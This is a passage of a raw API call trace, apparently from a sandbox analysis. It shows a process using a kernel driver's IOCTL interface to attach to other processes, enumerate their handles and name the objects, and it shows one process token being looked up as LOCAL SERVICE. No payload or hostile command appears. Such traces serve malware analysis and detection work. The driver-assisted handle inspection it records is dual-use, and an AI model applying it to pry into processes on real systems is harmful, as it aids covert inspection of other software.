PsAcquireProcessExitSynchronization () returned 0x0 [0244.404] KeStackAttachProcess (in: PROCESS=0xfffffa8003737b30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8003737b30, ApcState=0xfffff880053c85d0) [0244.404] ObReferenceObjectByHandle (in: Handle=0x168, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa800374ec90, HandleInformation=0x0) returned 0x0 [0244.404] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.404] PsReleaseProcessExitSynchronization () returned 0x2 [0244.404] ObfDereferenceObject (Object=0xfffffa8003737b30) returned 0xb2 [0244.404] ObQueryNameString (in: Object=0xfffffa800374ec90, ObjectNameInfo=0xfffffa8003076044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003076044, ReturnLength=0xfffff880053c8550) returned 0x0 [0244.404] ObfDereferenceObject (Object=0xfffffa800374ec90) returned 0x2 [0244.404] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0244.404] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0244.404] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0244.404] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x76, lpOverlapped=0x0) returned 1 [0244.404] PsLookupProcessByProcessId (in: ProcessId=0x294, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.404] PsAcquireProcessExitSynchronization () returned 0x0 [0244.404] KeStackAttachProcess (in: PROCESS=0xfffffa8003737b30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8003737b30, ApcState=0xfffff880053c85d0) [0244.404] ObReferenceObjectByHandle (in: Handle=0x170, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa800374e980, HandleInformation=0x0) returned 0x0 [0244.404] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.404] PsReleaseProcessExitSynchronization () returned 0x2 [0244.404] ObfDereferenceObject (Object=0xfffffa8003737b30) returned 0xb2 [0244.404] ObQueryNameString (in: Object=0xfffffa800374e980, ObjectNameInfo=0xfffffa8003077044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003077044, ReturnLength=0xfffff880053c8550) returned 0x0 [0244.404] ObfDereferenceObject (Object=0xfffffa800374e980) returned 0x2 [0244.404] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0244.404] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0244.404] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0244.405] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0244.405] PsLookupProcessByProcessId (in: ProcessId=0x294, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.405] PsAcquireProcessExitSynchronization () returned 0x0 [0244.405] KeStackAttachProcess (in: PROCESS=0xfffffa8003737b30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8003737b30, ApcState=0xfffff880053c85d0) [0244.405] ObReferenceObjectByHandle (in: Handle=0x174, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa800374ff20, HandleInformation=0x0) returned 0x0 [0244.405] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.405] PsReleaseProcessExitSynchronization () returned 0x2 [0244.405] ObfDereferenceObject (Object=0xfffffa8003737b30) returned 0xb2 [0244.405] ObQueryNameString (in: Object=0xfffffa800374ff20, ObjectNameInfo=0xfffffa8003078044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003078044, ReturnLength=0xfffff880053c8550) returned 0x0 [0244.405] ObfDereferenceObject (Object=0xfffffa800374ff20) returned 0x2 [0244.405] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0244.405] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0244.405] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0244.405] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0244.405] PsLookupProcessByProcessId (in: ProcessId=0x294, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.405] PsAcquireProcessExitSynchronization () returned 0x0 [0244.405] KeStackAttachProcess (in: PROCESS=0xfffffa8003737b30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8003737b30, ApcState=0xfffff880053c85d0) [0244.405] ObReferenceObjectByHandle (in: Handle=0x17c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8003751c80, HandleInformation=0x0) returned 0x0 [0244.405] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.405] PsReleaseProcessExitSynchronization () returned 0x2 [0244.405] ObfDereferenceObject (Object=0xfffffa8003737b30) returned 0xb2 [0244.405] ObQueryNameString (in: Object=0xfffffa8003751c80, ObjectNameInfo=0xfffffa800307a044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa800307a044, ReturnLength=0xfffff880053c8550) returned 0x0 [0244.406] ObfDereferenceObject (Object=0xfffffa8003751c80) returned 0x2 [0244.406] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0244.406] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0244.406] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0244.406] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x32, lpOverlapped=0x0) returned 1 [0244.406] PsLookupProcessByProcessId (in: ProcessId=0x294, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.406] PsAcquireProcessExitSynchronization () returned 0x0 [0244.406] KeStackAttachProcess (in: PROCESS=0xfffffa8003737b30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8003737b30, ApcState=0xfffff880053c85d0) [0244.406] ObReferenceObjectByHandle (in: Handle=0x180, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa80037529a0, HandleInformation=0x0) returned 0x0 [0244.406] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.406] PsReleaseProcessExitSynchronization () returned 0x2 [0244.406] ObfDereferenceObject (Object=0xfffffa8003737b30) returned 0xb2 [0244.406] ObQueryNameString (in: Object=0xfffffa80055f8e40, ObjectNameInfo=0xfffffa800307b044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa800307b044, ReturnLength=0xfffff880053c8508) returned 0x0 [0244.406] ObfDereferenceObject (Object=0xfffffa80037529a0) returned 0x1 [0244.406] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0244.406] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0244.407] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0244.407] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x32, lpOverlapped=0x0) returned 1 [0244.407] PsLookupProcessByProcessId (in: ProcessId=0x294, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.407] PsAcquireProcessExitSynchronization () returned 0x0 [0244.407] KeStackAttachProcess (in: PROCESS=0xfffffa8003737b30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8003737b30, ApcState=0xfffff880053c85d0) [0244.407] ObReferenceObjectByHandle (in: Handle=0x184, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8003754f20, HandleInformation=0x0) returned 0x0 [0244.407] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.407] PsReleaseProcessExitSynchronization () returned 0x2 [0244.407] ObfDereferenceObject (Object=0xfffffa8003737b30) returned 0xb2 [0244.407] ObQueryNameString (in: Object=0xfffffa80055f8e40, ObjectNameInfo=0xfffffa8003083044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa8003083044, ReturnLength=0xfffff880053c8508) returned 0x0 [0244.407] ObfDereferenceObject (Object=0xfffffa8003754f20) returned 0x1 [0244.407] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0244.407] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0244.407] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0244.407] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0244.407] PsLookupProcessByProcessId (in: ProcessId=0x294, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.407] PsAcquireProcessExitSynchronization () returned 0x0 [0244.407] KeStackAttachProcess (in: PROCESS=0xfffffa8003737b30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8003737b30, ApcState=0xfffff880053c85d0) [0244.407] ObReferenceObjectByHandle (in: Handle=0x1b0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8003758f20, HandleInformation=0x0) returned 0x0 [0244.407] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.407] PsReleaseProcessExitSynchronization () returned 0x2 [0244.407] ObfDereferenceObject (Object=0xfffffa8003737b30) returned 0xb2 [0244.407] ObQueryNameString (in: Object=0xfffffa8003758f20, ObjectNameInfo=0xfffffa8003084044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003084044, ReturnLength=0xfffff880053c8550) returned 0x0 [0244.408] ObfDereferenceObject (Object=0xfffffa8003758f20) returned 0x2 [0244.408] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0244.408] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0244.408] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0244.408] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0244.408] PsLookupProcessByProcessId (in: ProcessId=0x294, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.408] PsAcquireProcessExitSynchronization () returned 0x0 [0244.408] KeStackAttachProcess (in: PROCESS=0xfffffa8003737b30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8003737b30, ApcState=0xfffff880053c85d0) [0244.408] ObReferenceObjectByHandle (in: Handle=0x1b4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8003761880, HandleInformation=0x0) returned 0x0 [0244.408] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.408] PsReleaseProcessExitSynchronization () returned 0x2 [0244.408] ObfDereferenceObject (Object=0xfffffa8003737b30) returned 0xb2 [0244.408] ObQueryNameString (in: Object=0xfffffa8003761880, ObjectNameInfo=0xfffffa8003086044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003086044, ReturnLength=0xfffff880053c8550) returned 0x0 [0244.408] ObfDereferenceObject (Object=0xfffffa8003761880) returned 0x2 [0244.408] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0244.408] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0244.408] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0244.408] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x3e, lpOverlapped=0x0) returned 1 [0244.408] PsLookupProcessByProcessId (in: ProcessId=0x294, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.408] PsAcquireProcessExitSynchronization () returned 0x0 [0244.408] KeStackAttachProcess (in: PROCESS=0xfffffa8003737b30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8003737b30, ApcState=0xfffff880053c85d0) [0244.408] ObReferenceObjectByHandle (in: Handle=0x1bc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa80037639a0, HandleInformation=0x0) returned 0x0 [0244.408] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.408] PsReleaseProcessExitSynchronization () returned 0x2 [0244.408] ObfDereferenceObject (Object=0xfffffa8003737b30) returned 0xb2 [0244.409] ObQueryNameString (in: Object=0xfffffa80037639a0, ObjectNameInfo=0xfffffa8003087044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003087044, ReturnLength=0xfffff880053c8550) returned 0x0 [0244.409] ObfDereferenceObject (Object=0xfffffa80037639a0) returned 0x1 [0244.409] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0244.409] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0244.409] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0244.409] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x3e, lpOverlapped=0x0) returned 1 [0244.409] PsLookupProcessByProcessId (in: ProcessId=0x294, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.409] PsAcquireProcessExitSynchronization () returned 0x0 [0244.409] KeStackAttachProcess (in: PROCESS=0xfffffa8003737b30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8003737b30, ApcState=0xfffff880053c85d0) [0244.409] ObReferenceObjectByHandle (in: Handle=0x1c0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8003765b30, HandleInformation=0x0) returned 0x0 [0244.409] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.409] PsReleaseProcessExitSynchronization () returned 0x2 [0244.409] ObfDereferenceObject (Object=0xfffffa8003737b30) returned 0xb2 [0244.409] ObQueryNameString (in: Object=0xfffffa8003765b30, ObjectNameInfo=0xfffffa8003088044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003088044, ReturnLength=0xfffff880053c8550) returned 0x0 [0244.409] ObfDereferenceObject (Object=0xfffffa8003765b30) returned 0x2 [0244.409] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0244.409] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0244.409] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0244.409] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x3e, lpOverlapped=0x0) returned 1 [0244.409] PsLookupProcessByProcessId (in: ProcessId=0x294, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.409] PsAcquireProcessExitSynchronization () returned 0x0 [0244.409] KeStackAttachProcess (in: PROCESS=0xfffffa8003737b30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8003737b30, ApcState=0xfffff880053c85d0) [0244.409] ObReferenceObjectByHandle (in: Handle=0x1c4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa80037659e0, HandleInformation=0x0) returned 0x0 [0244.410] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.410] PsReleaseProcessExitSynchronization () returned 0x2 [0244.410] ObfDereferenceObject (Object=0xfffffa8003737b30) returned 0xb2 [0244.410] ObQueryNameString (in: Object=0xfffffa80037659e0, ObjectNameInfo=0xfffffa80033fa344, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa80033fa344, ReturnLength=0xfffff880053c8550) returned 0x0 [0244.410] ObfDereferenceObject (Object=0xfffffa80037659e0) returned 0x1 [0244.410] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0244.410] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0244.410] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0244.410] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x54, lpOverlapped=0x0) returned 1 [0244.410] PsLookupProcessByProcessId (in: ProcessId=0x294, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.410] PsAcquireProcessExitSynchronization () returned 0x0 [0244.410] KeStackAttachProcess (in: PROCESS=0xfffffa8003737b30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8003737b30, ApcState=0xfffff880053c85d0) [0244.410] ObReferenceObjectByHandle (in: Handle=0x20c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a000b13910, HandleInformation=0x0) returned 0x0 [0244.410] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.410] PsReleaseProcessExitSynchronization () returned 0x2 [0244.410] ObfDereferenceObject (Object=0xfffffa8003737b30) returned 0xb2 [0244.410] ObQueryNameString (in: Object=0xfffff8a000b13910, ObjectNameInfo=0xfffffa8003138044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003138044, ReturnLength=0xfffff880053c8550) returned 0x0 [0244.410] ObfDereferenceObject (Object=0xfffff8a000b13910) returned 0x23 [0244.410] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0244.410] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0244.410] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0244.410] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x54, lpOverlapped=0x0) returned 1 [0244.410] PsLookupProcessByProcessId (in: ProcessId=0x294, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.411] PsAcquireProcessExitSynchronization () returned 0x0 [0244.411] KeStackAttachProcess (in: PROCESS=0xfffffa8003737b30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8003737b30, ApcState=0xfffff880053c85d0) [0244.411] ObReferenceObjectByHandle (in: Handle=0x23c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a000b13910, HandleInformation=0x0) returned 0x0 [0244.411] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.411] PsReleaseProcessExitSynchronization () returned 0x2 [0244.411] ObfDereferenceObject (Object=0xfffffa8003737b30) returned 0xb2 [0244.411] ObQueryNameString (in: Object=0xfffff8a000b13910, ObjectNameInfo=0xfffffa8003068044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003068044, ReturnLength=0xfffff880053c8550) returned 0x0 [0244.411] ObfDereferenceObject (Object=0xfffff8a000b13910) returned 0x23 [0244.411] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0244.411] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0244.411] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2c8) returned 0xc8 [0244.411] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0244.411] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff880053c8668, HandleInformation=0x0 | out: Object=0xfffff880053c8668*=0xfffffa8003762b30, HandleInformation=0x0) returned 0x0 [0244.411] ObOpenObjectByPointer (in: Object=0xfffffa8003762b30, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff880053c8670 | out: Handle=0xfffff880053c8670*=0xffffffff80000588) returned 0x0 [0244.411] ObfDereferenceObject (Object=0xfffffa8003762b30) returned 0xcd [0244.411] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000588, DesiredAccess=0x8, TokenHandle=0xfffffa80030b9a00 | out: TokenHandle=0xfffffa80030b9a00*=0xc4) returned 0x0 [0244.411] ZwClose (Handle=0xffffffff80000588) returned 0x0 [0244.411] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0244.411] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0244.411] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x13), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="LOCAL SERVICE", cchName=0x12d3c0, ReferencedDomainName="NT AUTHORITY", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0244.556] CloseHandle (hObject=0xc4) returned 1 [0244.556] CloseHandle (hObject=0xc8) returned 1 [0244.556] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0244.556] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x5a, lpOverlapped=0x0) returned 1 [0244.556] PsLookupProcessByProcessId (in: ProcessId=0x2c8, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.556] PsAcquireProcessExitSynchronization () returned 0x0 [0244.556] KeStackAttachProcess (in: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880053c85d0) [0244.556] ObReferenceObjectByHandle (in: Handle=0xc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa800375adc0, HandleInformation=0x0) returned 0x0 [0244.556] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.556] PsReleaseProcessExitSynchronization () returned 0x2 [0244.556] ObfDereferenceObject (Object=0xfffffa8003762b30) returned 0xcb [0244.556] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa80030de7c4, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa80030de7c4, ReturnLength=0xfffff880053c8508) returned 0x0 [0244.556] ObfDereferenceObject (Object=0xfffffa800375adc0) returned 0x1 [0244.556] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0244.556] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0244.556] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0244.556] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x26, lpOverlapped=0x0) returned 1 [0244.556] PsLookupProcessByProcessId (in: ProcessId=0x2c8, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.556] PsAcquireProcessExitSynchronization () returned 0x0 [0244.556] KeStackAttachProcess (in: 